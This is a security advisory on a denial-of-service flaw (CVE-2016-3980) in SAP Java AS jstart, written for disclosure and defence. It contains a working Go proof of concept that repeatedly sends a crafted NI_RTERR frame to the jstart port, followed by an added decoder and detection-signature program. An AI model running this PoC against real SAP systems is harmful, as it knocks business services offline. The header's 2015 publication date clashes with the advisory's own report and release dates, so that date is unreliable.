ERPScan advisory ERPSCAN-16-018
Published: Apr 12, 2015

SAP JAVA AS jstart - DoS vulnerability

Source: erpscan.io

EPSS: 0.002 (Low), percentile 59.9%

Application: SAP JAVA AS
Versions Affected: SAP JAVA AS 7.2 – 7.4
Vendor URL: SAP
Bugs: Denial of Service
Reported: 04.12.2015
Vendor response: 05.12.2015
Date of Public Advisory: 14.03.2016
Reference: SAP Security Note 2259547
Author: Dmitry Yudin (ERPScan) @ret5et

Vulnerability Information

Class: denial of service
Impact: denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2016-3980
CVSS Information
CVSS Base Score v3: 7.5 / 10
CVSS Base Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality None (N)
I: Impact to Integrity None (N)
A: Impact to Availability High (H)

Description

The Java Startup Framework (jstart) in SAP JAVA AS 7.4 allows remote attackers to cause a denial of service via a crafted HTTP request.

Business risk

A denial-of-service vulnerability lets an attacker terminate a process of the vulnerable component. While that process is down, nobody can use the service, which disrupts the business processes that depend on it, and the downtime also harms the organization's reputation.

VULNERABLE PACKAGES

SAP NetWeaver AS JAVA 7.2 – 7.4
Other versions are probably affected too, but they were not checked.

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2259547.

TECHNICAL DESCRIPTION

An unauthenticated remote attacker can send a specially crafted HTTP request to cause a denial of service in SAP AS JAVA. The proof of concept below opens TCP connections to the jstart port in a loop from two concurrent goroutines and writes the same fixed 32-byte request to each connection; its banner labels the underlying fault a race condition.

Proof of Concept

```go
package main

import (
	"flag"
	"fmt"
	"net"
	"sync"
)

// Globals
var wg sync.WaitGroup

// dos opens connections to the jstart port in a tight loop and writes the
// crafted request to each one until a connection attempt fails, which the
// PoC treats as the server having stopped responding.
func dos(constr string) {
	defer wg.Done()
	// Crafted request: 4-byte big-endian length prefix (0x1c = 28) followed by
	// 28 payload bytes that begin with the ASCII marker NI_RTERR.
	var data = "\x00\x00\x00\x1cNI_RTERR\x00y\x04\x00\x00ASD\x00\x00\x00\x04DAAAAAAA"
	for {
		conn, err := net.Dial("tcp", constr)
		if err != nil {
			fmt.Print("Server is not responding... \n")
			return
		}
		// Write the raw bytes. The original used Fprintf with the payload as the
		// format string; the payload contains no format verbs, so a plain write is equivalent.
		conn.Write([]byte(data))
		// The original never read the reply and never closed the socket. Close it so the
		// client does not run out of its own file descriptors before the server fails.
		conn.Close()
	}
}

func main() {
	// The original PoC defaulted the IP to an undefined placeholder SAP_IP; the
	// target is taken from the command line instead. The port is masked as 64*** in the advisory.
	var port = flag.String("port", "0", "jstart tcp port")
	var ip = flag.String("ip", "", "jstart ip address")
	flag.Parse()
	if *ip == "" {
		fmt.Println("usage: -ip <address> -port <jstart tcp port>")
		return
	}
	constr := fmt.Sprintf("%s:%s", *ip, *port)
	// Two goroutines race each other against the same port. Add to the WaitGroup
	// before starting each goroutine, not after (the original had the order reversed).
	for i := 0; i < 2; i++ {
		wg.Add(1)
		go dos(constr)
	}
	fmt.Println("Waiting ...")
	fmt.Println("jstart - DoS Vuln(race condition) - port 64*** ... ")
	wg.Wait()
	fmt.Println("Done")
}
```
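The byte string the PoC sends is a SAP NI frame: a 4-byte big-endian length prefix (0x0000001c = 28) followed by exactly 28 payload bytes that start with the ASCII marker NI_RTERR. The following Go program is an added example, not code from the ERPScan advisory or from SAP. It decodes that frame, re-encodes it from its payload, rejects a frame whose declared length exceeds the bytes actually present (the check a receiver must make before trusting the prefix), and offers an exact-match predicate that a detection rule over captured jstart traffic could use. The NI length-prefix framing is SAP's general convention; the type and function names (`NIFrame`, `DecodeNI`, `EncodeNI`, `IsRtErr`, `MatchesPoC`) are this example's own, the PoC bytes are embedded as constructed sample input, and nothing here claims how jstart itself processes the frame.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
)

// pocFrame is the exact byte string the PoC above writes to the jstart port,
// embedded here as constructed sample input for the parser.
const pocFrame = "\x00\x00\x00\x1cNI_RTERR\x00y\x04\x00\x00ASD\x00\x00\x00\x04DAAAAAAA"

// niHeaderLen is the size of the SAP NI length prefix: a 4-byte big-endian
// unsigned integer giving the number of payload bytes that follow.
const niHeaderLen = 4

// rtErrMarker is the ASCII marker at the start of the PoC payload.
var rtErrMarker = []byte("NI_RTERR")

// NIFrame is one decoded NI record (example type, not a SAP API).
type NIFrame struct {
	DeclaredLen uint32 // value of the length prefix
	Payload     []byte // the DeclaredLen bytes that follow the prefix
}

// EncodeNI prefixes payload with its big-endian length, the framing the PoC
// uses (0x0000001c for its 28-byte payload).
func EncodeNI(payload []byte) []byte {
	out := make([]byte, niHeaderLen+len(payload))
	binary.BigEndian.PutUint32(out, uint32(len(payload)))
	copy(out[niHeaderLen:], payload)
	return out
}

// DecodeNI parses one NI frame from the front of buf and returns the frame,
// the unconsumed remainder, and an error if the prefix is missing or the
// declared length exceeds the bytes actually available. Trusting the declared
// length without this comparison is the classic length-prefix parsing mistake.
func DecodeNI(buf []byte) (NIFrame, []byte, error) {
	if len(buf) < niHeaderLen {
		return NIFrame{}, buf, errors.New("short read: no NI length prefix")
	}
	n := binary.BigEndian.Uint32(buf)
	avail := len(buf) - niHeaderLen
	if uint64(n) > uint64(avail) {
		return NIFrame{}, buf, fmt.Errorf("declared length %d exceeds %d available bytes", n, avail)
	}
	end := niHeaderLen + int(n)
	return NIFrame{DeclaredLen: n, Payload: buf[niHeaderLen:end]}, buf[end:], nil
}

// IsRtErr reports whether the payload begins with the NI_RTERR marker, the
// feature a detection rule for this PoC traffic would key on first.
func (f NIFrame) IsRtErr() bool {
	return bytes.HasPrefix(f.Payload, rtErrMarker)
}

// MatchesPoC reports whether a captured TCP payload is byte-for-byte the PoC frame.
func MatchesPoC(captured []byte) bool {
	return bytes.Equal(captured, []byte(pocFrame))
}

func main() {
	frame, rest, err := DecodeNI([]byte(pocFrame))
	if err != nil {
		fmt.Println("decode failed:", err)
		return
	}
	fmt.Printf("declared length: %d, payload bytes: %d, NI_RTERR marker: %v, trailing bytes: %d\n",
		frame.DeclaredLen, len(frame.Payload), frame.IsRtErr(), len(rest))
	fmt.Printf("re-encoded frame equals PoC bytes: %v\n", MatchesPoC(EncodeNI(frame.Payload)))

	// A frame cut short of its declared length is rejected rather than over-read.
	_, _, err = DecodeNI([]byte(pocFrame)[:20])
	fmt.Println("truncated frame:", err)
}
```

Run it with `go run .` and point `DecodeNI` at reassembled TCP payloads from a capture of the jstart port to pull out the frames; `MatchesPoC` is deliberately exact so that it flags only this PoC's bytes, while `IsRtErr` is the looser signal to combine with connection-rate thresholds when hunting for variants.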
